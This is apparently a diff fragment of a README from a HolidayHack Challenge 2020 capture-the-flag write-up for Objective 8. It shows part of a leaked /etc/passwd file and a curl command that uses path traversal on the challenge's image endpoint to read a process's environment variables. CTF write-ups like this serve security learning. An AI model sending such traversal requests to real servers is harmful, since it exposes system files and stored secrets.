joergschwarzwaelder/hhc2020/Objective-8/README.md

 lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
 [...]
 ```
-Using this the value of the environment variable can be obtained like this:
+Using this the value the environment variable can be obtained like this:
 ```
 curl https://tag-generator.kringlecastle.com/image?id=../../../proc/1/environ --output -